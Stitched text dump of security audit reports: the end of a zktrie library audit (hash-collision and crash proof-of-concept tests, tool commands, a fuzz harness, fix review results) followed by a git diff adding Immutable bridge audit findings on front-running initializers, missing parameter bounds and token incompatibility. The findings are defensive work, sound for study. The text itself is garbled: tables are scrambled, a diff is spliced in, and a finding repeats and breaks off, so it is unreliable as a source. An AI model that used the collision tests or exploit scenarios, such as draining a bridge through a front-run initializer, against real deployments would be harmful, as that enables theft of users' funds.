39ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f 8b00").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing the data array with the appropriate length that will cause the cast to result in a negative number. Figure 19.2 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!("{:?}", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validation if the conversion succeeds. Determine whether the Rust functions should allow arbitrary length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Data Handling The safe handling of user inputs and data processed by the system Documentation The presence of comprehensive and readable codebase documentation Maintenance The timely maintenance of system components to mitigate risk Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Unnecessary parentheses on function call // NewSecure creates a trie // SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the // underlying diskdb func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) { maxLevels := NodeKeyValidBytes * 8 tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels) Figure C.1: zktrie/trie/zk_trie.go#49–54 ● Typo in code comment // reduce 2 fieds into one Figure C.2: types/util.go#L8-L8 ● Copy-pasted code comment // ErrNodeKeyAlreadyExists is used when a node key already exists. ErrInvalidField = errors.New("Key not inside the Finite Field") Figure C.3: zktrie/trie/zk_trie_impl.go#20–21 ● Empty if branch if e != nil { //fmt.Println("err on NodeTypeEmpty mt.addNode ", e) } return r, e Figure C.4: zktrie/trie/zk_trie_impl.go#190–193 ● Superfluous nil error check if err != nil { return err } return nil Figure C.5: zktrie/trie/zk_trie_impl.go#120– ● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message. pub fn update_account( &mut self, key: &[u8], acc_fields: &AccountData, ) -> Result<(), ErrString> { let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe { let ptr = acc_fields.as_ptr(); ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>() .as_ref() .expect("casted ptr can not be null") Figure C.6: zktrie/src/lib.rs#279–288 ● Typo in code comment // ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer) Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41) ● Redundant error handling. The following code should simply check whether err!= nil and then return nil, err. if err == ErrKeyNotFound { return nil, ErrKeyNotFound } else if err != nil { return nil, err } Figure C.8: zktrie/trie/zk_trie_impl.go#508–512 ● Typo in variable name. The variables should read FIELD instead of FILED. static FILED_ERROR_READ: &str = "invalid input field"; static FILED_ERROR_OUT: &str = "output field fail"; Figure C.9: zktrie/src/lib.rs#309–310 ● The difference between NewHashFromBytes and NewHashFromBytesChecked is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length. // NewHashFromBytes returns a *Hash from a byte array considered to be // a represent of big-endian integer, it swapping the endianness // in the process. func NewHashFromBytes(b []byte) *Hash { var h Hash copy(h[:], ReverseByteOrder(b)) return &h } // NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array // that previously has ben generated by the Hash.Bytes() method. so it check the // size of bytes to be expected length func NewHashFromCheckedBytes(b []byte) (*Hash, error) { if len(b) != HashByteLen { return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b)) } return NewHashFromBytes(b), nil } Figure C.10: types/hash.go#111–128 ● Unclear comment. The “create-delete issue” should be documented. //mitigate the create-delete issue: do not delete unexisted key Figure C.11: trie/zk_trie.go#118 ● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns. // delete leaf, silently omit any error //export TrieDelete func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) { h := cgo.Handle(p) tr := h.Value().(*trie.ZkTrie) key := C.GoBytes(unsafe.Pointer(key_c), key_sz) tr.TryDelete(key) } Figure C.12: lib.go#243– D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. golangci-lint We used the static analyzer aggregator golangci-lint to quickly analyze the codebase. D.2. Semgrep We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored. git clone git@github.com:dgryski/semgrep-go.git git clone https://github.com/0xdea/semgrep-rules semgrep --metrics=off --sarif --config p/r2c-security-audit semgrep --metrics=off --sarif --config p/trailofbits semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml semgrep --metrics=off --sarif --config semgrep-go semgrep --metrics=off --sarif --config semgrep-rules Figure D.1: The commands used to run Semgrep D.3. CodeQL We analyzed the Go codebase with ’s private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL. # Create the go database codeql database create codeql.db --language=go # Run all go queries codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all Figure D.2: Commands used to run CodeQL D.4. go cover We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report: go test -cover -coverprofile c.out && go tool cover -html=c.out Note that this needs to be run separately for each folder. D.5. cargo audit This tool audits Cargo.lock against the RustSec advisory database. This tool did not reveal any findings but should be run every time new dependencies are included in the codebase. D.6. cargo-llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests. D.7. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy warns about casting operations from usize to c_int that resulted in finding TOB-ZKTRIE-19. E. Go Fuzzing Harness During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign. // Truncate or pad array to length sz func padtolen(arr []byte, sz int) []byte { if len(arr) < sz { arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...) } else { arr = arr[:sz] } return arr } func FuzzVerifyProofZkTrie(f *testing.F) { zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10) k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32)) vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))} node := NewLeafNode(k, 1, vp) f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte, siblings []byte, nodeAuxA []byte, nodeAuxB []byte) { notempties = padtolen(notempties, 30) typedsiblings := make([]*zkt.Hash, 10) for i := range typedsiblings { typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32)) } typedata := [30]byte{} copy(typedata[:], notempties) var nodeAux *NodeAux if !existence { nodeAux = &NodeAux{ Key: zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)), Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)), } } proof := &Proof{ Existence: existence, depth: notempties: typedata, Siblings: depth, typedsiblings, NodeAux: nodeAux, } if VerifyProofZkTrie(zkTrie.rootHash, proof, node) { panic("valid proof") } }) } Figure E.1: The fuzzing harness for VerifyProofZkTrie F. Go Randomized Test During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest. // Basic randomized test to verify the trie's set, get, and remove features. func TestZkTrie_BasicRandomTest(t *testing.T) { root := zkt.Byte32{} db := NewZkTrieMemoryDb() zkTrie, err := NewZkTrie(root, db) assert.NoError(t, err) idealTrie := make(IdealTrie) const NUM_BYTES = 32 const NUM_KEYS = 1024 keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) // PHASE 1: toss a coin and set elements (Works) for i := 0; i < len(keys); i++ { if toss(t) == true { set(t, zkTrie, idealTrie, keys[i], data[i]) } } // PHASE 2: toss a coin and get elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { get(t, zkTrie, idealTrie, keys[i]) } } // PHASE 3: toss a coin and remove elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { remove(t, zkTrie, idealTrie, keys[i]) } } } Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go) type IdealTrie = map[string][]byte func random_hex_str(t *testing.T, str_bytes int) string { outBytes := make([]byte, str_bytes) n, err := rand.Read(outBytes) assert.NoError(t, err) assert.Equal(t, n, str_bytes) return hex.EncodeToString(outBytes) } func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string { out := []string{} for i := 0; i < array_size; i++ { hex_str := random_hex_str(t, str_bytes) out = append(out, hex_str) } return out } // Randomly returns true or false func toss(t *testing.T) bool { n, err := rand.Int(rand.Reader, big.NewInt(2)) assert.NoError(t, err) return (n.Cmp(big.NewInt(1)) == 0) } func hex_to_bytes(t *testing.T, hex_str string) []byte { key, err := hex.DecodeString(hex_str) assert.NoError(t, err) return key } func bytes_to_byte32(b []byte) []zkt.Byte32 { if len(b)%32 != 0 { panic("unaligned arrays are unsupported") } l := len(b) / 32 out := make([]zkt.Byte32, l) i := 0 for i < l { copy(out[i][:], b[i*32:(i+1)*32]) i += 1 } return out } // Tests that an inclusion proof for a given key can be generated and verified. func verify_inclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.True(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.NoError(t, err) assert.NotNil(t, hash) } // Tests that a non-inclusion proof for a given key can be generated and verified. func verify_noninclusion(t *testing.T, zkTrie *ZkTrie, key []byte) { lvl := 100 secureKey, err := zkt.ToSecureKey(key) assert.NoError(t, err) proof, node, err := BuildZkTrieProof(zkTrie.tree.rootHash, secureKey, lvl, zkTrie.tree.GetNode) assert.NoError(t, err) valid := VerifyProofZkTrie(zkTrie.tree.rootHash, proof, node) assert.False(t, valid) hash, err := proof.Verify(node.nodeHash, node.NodeKey) assert.Error(t, err) assert.Nil(t, hash) } // Verifies that adding elements from the trie works. func set(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string, data_hex string) { vFlag := uint32(1) key := hex_to_bytes(t, key_hex) data := hex_to_bytes(t, data_hex) err := zkTrie.TryUpdate(key, vFlag, bytes_to_byte32(data)) assert.NoError(t, err) idealTrie[key_hex] = data verify_inclusion(t, zkTrie, key) } // Verifies that retrieving elements from the trie works. func get(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) ideal_data, ok := idealTrie[key_hex] if ok { trie_data, err := zkTrie.TryGet(key) assert.NoError(t, err) assert.True(t, reflect.DeepEqual(trie_data, ideal_data)) verify_inclusion(t, zkTrie, key) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) verify_noninclusion(t, zkTrie, key) } } // Verifies that removing elements from the trie works. func remove(t *testing.T, zkTrie *ZkTrie, idealTrie IdealTrie, key_hex string) { key := hex_to_bytes(t, key_hex) _, ok := idealTrie[key_hex] if ok { delete(idealTrie, key_hex) err := zkTrie.TryDelete(key) assert.NoError(t, err) } else { _, err := zkTrie.TryGet(key) assert.Equal(t, ErrKeyNotFound, err) } verify_noninclusion(t, zkTrie, key) } Figure F.2: Helper functions for TestZkTrie_BasicRandomTest (trie/zk_trie_test.go) G. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On September 13, 2023, reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. received fix PRs for findings TOB-ZKTRIE-1, TOB-ZKTRIE-4, TOB-ZKTRIE-5, TOB-ZKTRIE-16, TOB-ZKTRIE-18, and TOB-ZKTRIE-19. Scroll did not provide fix PRs for the medium-severity findings TOB-ZKTRIE-2, TOB-ZKTRIE-10, and TOB-ZKTRIE-12; the low-severity finding TOB-ZKTRIE-11; or the remaining findings, all of which are of informational severity. In summary, of the 19 issues described in this report, Scroll has resolved five issues and has partially resolved one issue. No fix PRs were provided for the remaining 13 issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below. ID Title Status 1 2 3 4 5 6 7 Lack of domain separation allows proof forgery Resolved Lack of proof validation causes denial of service on the verifier Undetermined Two incompatible ways to generate proofs Undetermined BuildZkTrieProof does not populate NodeAux.Value Resolved Leaf nodes with different values may have the same hash Resolved Empty UpdatePreimage function body Undetermined CanonicalValue is not canonical Undetermined 8 9 10 11 ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined Unused key argument on the bridge_prove_write function Undetermined The PreHandlingElems function panics with an empty elems array Undetermined The hash_external function panics with integers larger than 32 bytes Undetermined 12 Mishandling of cgo.Handles causes runtime errors Undetermined 13 Unnecessary unsafe pointer manipulation in Node.Data() Undetermined 14 NewNodeFromBytes does not fully validate its input Undetermined 15 init_hash_scheme is not thread-safe Undetermined 16 Safe-Rust ZkMemoryDb interface is not thread-safe Resolved Detailed Fix Review Results TOB-ZKTRIE-1: Lack of domain separation allows proof forgery Resolved in PR #11. Domain separation is now performed between leaves, Byte32 values, and several different types of internal branches. Additionally, sequence-length domain separation has been added to HashElems as part of the fixes for finding TOB-ZKTRIE-5. HashElemsWithDomain does not add its own domain separation and is potentially error-prone. It appears to be used correctly, but the Scroll team should consider making HashElemsWithDomain private to prevent misuse. TOB-ZKTRIE-2: Lack of proof validation causes denial of service on the verifier Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-3: Two incompatible ways to generate proofs Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-4: BuildZkTrieProof does not populate NodeAux.Value Resolved in PR #11. The BuildZkTrieProof function now calls ValueHash, which populates NodeAux. TOB-ZKTRIE-5: Leaf nodes with different values may have the same hash Resolved in PR #11. NodeHash now uses HandlingElemsAndByte32, which calls HashElems, which adds domain separation based on the length of its input to recursive calls in the internal Merkle tree structure. TOB-ZKTRIE-6: Empty UpdatePreimage function body Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-7: CanonicalValue is not canonical Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-8: ToSecureKey and ToSecureKeyBytes implicitly truncate the key Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-9: Unused key argument on the bridge_prove_write function Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-10: The PreHandlingElems function panics with an empty elems array Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-11: The hash_external function panics with integers larger than 32 bytes Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-12: Mishandling of cgo.Handles causes runtime errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-13: Unnecessary unsafe pointer manipulation in Node.Data() Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-14: NewNodeFromBytes does not fully validate its input Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-15: init_hash_scheme is not thread-safe Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-16: Safe-Rust ZkMemoryDb interface is not thread-safe Resolved in PR #12. The use of the non-thread-safe function Database.Init was replaced with Put, which is thread-safe. The Scroll team should consider adding cautionary documentation to Init to prevent its misuse in the future. TOB-ZKTRIE-17: Some Node functions return the zero hash instead of errors Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-ZKTRIE-18: get_account can read past the buffer Partially resolved in PR #13. The get_account function now verifies the slice length. However, the function may still misbehave on platforms where Go’s int type is 32 bits and if given a value above unlikely to cause problems in practice. However, adding assert calls to ZkTrie::get and , which may cause the cast to overflow. This seems extremely 31 2 TrieGetSize to restrict the size to be below a reasonable upper bound such as prevent this issue entirely by causing the program to terminate if the affected code is misused on a problematic platform. 30 2 would TOB-ZKTRIE-19: Unchecked usize to c_int casts allow hash collisions by length misinterpretation Resolved in PR #14. This implementation will now crash instead of triggering a bug. The Scroll team should watch for possible denials of service when deploying the software. H. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/tob/2023-08-immutable-securityreview.txt b/findings_newupdate/tob/2023-08-immutable-securityreview.txt new file mode 100644 index 0000000..e44ecda --- /dev/null +++ b/findings_newupdate/tob/2023-08-immutable-securityreview.txt @@ -0,0 +1,9 @@ +1. Initialization functions vulnerable to front-running Severity: Informational Difficulty: High Type: Timing Finding ID: TOB-IMM-1 Target: Throughout Description Several implementation contracts have initialization functions that can be front-run, which would allow an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, the RootERC20Predicate and RootERC20PredicateFlowRate contracts (as well as other upgradeable contracts that are not in scope) cannot be initialized with a constructor, so they have initialize functions: function initialize ( address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external virtual initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); } Figure 1.1: Front-runnable initialize function ( RootERC20Predicate.sol ) function initialize ( address superAdmin , address pauseAdmin , address unpauseAdmin , address rateAdmin , address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); __Pausable_init(); __FlowRateWithdrawalQueue_init(); _setupRole(DEFAULT_ADMIN_ROLE, superAdmin); _setupRole(PAUSER_ADMIN_ROLE, pauseAdmin); _setupRole(UNPAUSER_ADMIN_ROLE, unpauseAdmin); _setupRole(RATE_CONTROL_ROLE, rateAdmin); } Figure 1.2: Front-runnable initialize function ( RootERC20PredicateFlowRate.sol ) An attacker could front-run these functions and initialize the contracts with malicious values. The documentation provided by the Immutable team indicates that they are aware of this issue and how to mitigate it upon deployment of the proxy or when upgrading the implementation. However, there do not appear to be any deployment scripts to demonstrate that this will be correctly done in practice, and the codebase’s tests do not cover upgradeability. Exploit Scenario Bob deploys the RootERC20Predicate contract. Eve deploys an upgradeable version of the ExitHelper contract and front-runs the RootERC20Predicate initialization, passing her contract’s address as the exitHelper argument. Due to a lack of post-deployment checks, this issue goes unnoticed and the protocol functions as intended for some time, drawing in a large amount of deposits. Eve then upgrades the ExitHelper contract to allow her to arbitrarily call the onL2StateReceive function of the RootERC20Predicate contract, draining all assets from the bridge. Recommendations Short term, either use a factory pattern that will prevent front-running the initialization, or ensure that the deployment scripts have robust protections against front-running attacks. Long term, carefully review the Solidity documentation , especially the “Warnings” section, and the pitfalls of using the delegatecall proxy pattern. +2. Lack of lower and upper bounds for system parameters Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-IMM-2 Target: contracts/root/flowrate/RootERC20PredicateFlowRate.sol Description The lack of lower and upper bound checks when setting important system parameters could lead to a temporary denial of service, allow users to complete their withdrawals prematurely, or otherwise hinder the expected performance of the system. The setWithdrawalDelay function of the RootERC20PredicateFlowRate contract can be used by the rate control role to set the amount of time that a user needs to wait before they can withdraw their assets from the root chain of the bridge. // RootERC20PredicateFlowRate.sol function setWithdrawalDelay ( uint256 delay ) external onlyRole(RATE_CONTROL_ROLE) { _setWithdrawalDelay(delay); } // FlowRateWithdrawalQueue.sol function _setWithdrawalDelay ( uint256 delay ) internal { withdrawalDelay = delay; emit WithdrawalDelayUpdated(delay); } Figure 2.1: The setter functions for the withdrawalDelay state variable ( RootERC20PredicateFlowRate.sol and FlowRateWithdrawalQueue.sol ) The withdrawalDelay variable value is applied to all currently pending withdrawals in the system, as shown in the highlighted lines of figure 2.2. function _processWithdrawal ( address receiver , uint256 index ) internal returns ( address withdrawer , address token , uint256 amount ) { // ... // Note: Add the withdrawal delay here, and not when enqueuing to allow changes // to withdrawal delay to have effect on in progress withdrawals. uint256 withdrawalTime = withdrawal.timestamp + withdrawalDelay; // slither-disable-next-line timestamp if ( block.timestamp < withdrawalTime) { // solhint-disable-next-line not-rely-on-time revert WithdrawalRequestTooEarly( block.timestamp , withdrawalTime); } // ... } Figure 2.2: The function completes a withdrawal from the withdrawal queue if the withdrawalTime has passed. ( FlowRateWithdrawalQueue.sol ) However, the setWithdrawalDelay function does not contain any validation on the delay input parameter. If the input parameter is set to zero, users can skip the withdrawal queue and immediately withdraw their assets. Conversely, if this variable is set to a very high value, it could prevent users from withdrawing their assets for as long as this variable is not updated. The setRateControlThreshold allows the rate control role to set important token parameters that are used to limit the amount of tokens that can be withdrawn at once, or in a certain time period, in order to mitigate the risk of a large amount of tokens being bridged after an exploit. // RootERC20PredicateFlowRate.sol function setRateControlThreshold ( address token , uint256 capacity , uint256 refillRate , uint256 largeTransferThreshold ) external onlyRole(RATE_CONTROL_ROLE) { _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; } // FlowRateDetection.sol function _setFlowRateThreshold ( address token , uint256 capacity , uint256 refillRate ) internal { if (token == address ( 0 )) { revert InvalidToken(); } if (capacity == 0 ) { revert InvalidCapacity(); } if (refillRate == 0 ) { revert InvalidRefillRate(); } Bucket storage bucket = flowRateBuckets[token]; if (bucket.capacity == 0 ) { bucket.depth = capacity; } bucket.capacity = capacity; bucket.refillRate = refillRate; } Figure 2.3: The function sets the system parameters to limit withdrawals of a specific token. ( RootERC20PredicateFlowRate.sol and FlowRateDetection.sol ) However, because the _setFlowRateThreshold function of the FlowRateDetection contract is missing upper bounds on the input parameters, these values could be set to an incorrect or very high value. This could potentially allow users to withdraw large amounts of tokens at once, without triggering the withdrawal queue. Exploit Scenario Alice attempts to update the withdrawalDelay state variable from 24 to 48 hours. However, she mistakenly sets the variable to 0 . Eve uses this setting to skip the withdrawal queue and immediately withdraws her assets. Recommendations Short term, determine reasonable lower and upper bounds for the setWithdrawalDelay and setRateControlThreshold functions, and add the necessary validation to those functions. Long term, carefully document which system parameters are configurable and ensure they have adequate upper and lower bound checks. +3. RootERC20Predicate is incompatible with nonstandard ERC-20 tokens Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-IMM-3 Target: contracts/root/RootERC20Predicate.sol Description The deposit and depositTo functions of the RootERC20Predicate contract are incompatible with nonstandard ERC-20 tokens, such as tokens that take a fee on transfer. The RootERC20Predicate contract allows users to deposit arbitrary tokens into the root chain of the bridge and mint the corresponding token on the child chain of the bridge. Users can deposit their tokens by approving the bridge for the required amount and then calling the deposit or depositTo function of the contract. These functions will call the internal _depositERC20 function, which will perform a check to ensure the token balance of the contract is exactly equal to the balance of the contract before the deposit, plus the amount of tokens that are being deposited. function _depositERC20 (IERC20Metadata rootToken, address receiver , uint256 amount ) private { uint256 expectedBalance = rootToken.balanceOf( address ( this )) + amount; _deposit(rootToken, receiver, amount); // invariant check to ensure that the root token balance has increased by the amount deposited // slither-disable-next-line incorrect-equality require ((rootToken.balanceOf( address ( this )) == expectedBalance), "RootERC20Predicate: UNEXPECTED_BALANCE" ); } Figure 3.1: Internal function used to deposit ERC-20 tokens to the bridge ( RootERC20Predicate.sol ) However, some nonstandard ERC-20 tokens will take a percentage of the transferred amount as a fee. Due to this, the require statement highlighted in figure 3.1 will always fail, preventing users from depositing such tokens. Recommendations Short term, clearly document that nonstandard ERC-20 tokens are not supported by the protocol. If the team determines that they want to support nonstandard ERC-20 implementations, additional logic should be added into the _deposit function to determine the actual token amount received by the contract. In this case, reentrancy protection may be needed to mitigate the risks of ERC-777 and similar tokens that implement callbacks whenever tokens are sent or received. Long term, be aware of the idiosyncrasies of ERC-20 implementations. This standard has a history of misuses and issues. References ● ● Incident with non-standard ERC20 deflationary tokens d-xo/weird-erc20 +4. Lack of event generation Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-IMM-4 Target: RootERC20PredicateFlowRate.sol , ImmutableSeaport.sol Description Multiple critical operations do not emit events. This creates uncertainty among users interacting with the system. The setRateControlThresholds function in the RootERC20PredicateFlowRate contract does not emit an event when it updates the largeTransferThresholds critical storage variable for a token (figure 4.1). However, having an event emitted to reflect such a change in the critical storage variable may allow other system and off-chain components to detect suspicious behavior in the system. Events generated during contract execution aid in monitoring, baselining behavior, and detecting suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and malfunctioning contracts and attacks could go undetected. function setRateControlThreshold ( 1 address token , 2 uint256 capacity , 3 uint256 refillRate , 4 5 uint256 largeTransferThreshold 6 ) external onlyRole(RATE_CONTROL_ROLE) { 7 8 9 } _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; Figure 4.1: The setRateControlThreshold function ( RootERC20PredicateFlowRate.sol #L214-L222 ) In addition to the above function, the following function should also emit events: ● The setAllowedZone function in seaport/contracts/ImmutableSeaport.sol Recommendations Short term, add events for all functions that change state to aid in better monitoring and alerting. Long term, ensure that all state-changing operations are always accompanied by events. In addition, use static analysis tools such as Slither to help prevent such issues in the future. +1. Initialization functions vulnerable to front-running Severity: Informational Difficulty: High Type: Timing Finding ID: TOB-IMM-1 Target: Throughout Description Several implementation contracts have initialization functions that can be front-run, which would allow an attacker to incorrectly initialize the contracts. Due to the use of the delegatecall proxy pattern, the RootERC20Predicate and RootERC20PredicateFlowRate contracts (as well as other upgradeable contracts that are not in scope) cannot be initialized with a constructor, so they have initialize functions: function initialize ( address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external virtual initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); } Figure 1.1: Front-runnable initialize function ( RootERC20Predicate.sol ) function initialize ( address superAdmin , address pauseAdmin , address unpauseAdmin , address rateAdmin , address newStateSender , address newExitHelper , address newChildERC20Predicate , address newChildTokenTemplate , address nativeTokenRootAddress ) external initializer { __RootERC20Predicate_init( newStateSender, newExitHelper, newChildERC20Predicate, newChildTokenTemplate, nativeTokenRootAddress ); __Pausable_init(); __FlowRateWithdrawalQueue_init(); _setupRole(DEFAULT_ADMIN_ROLE, superAdmin); _setupRole(PAUSER_ADMIN_ROLE, pauseAdmin); 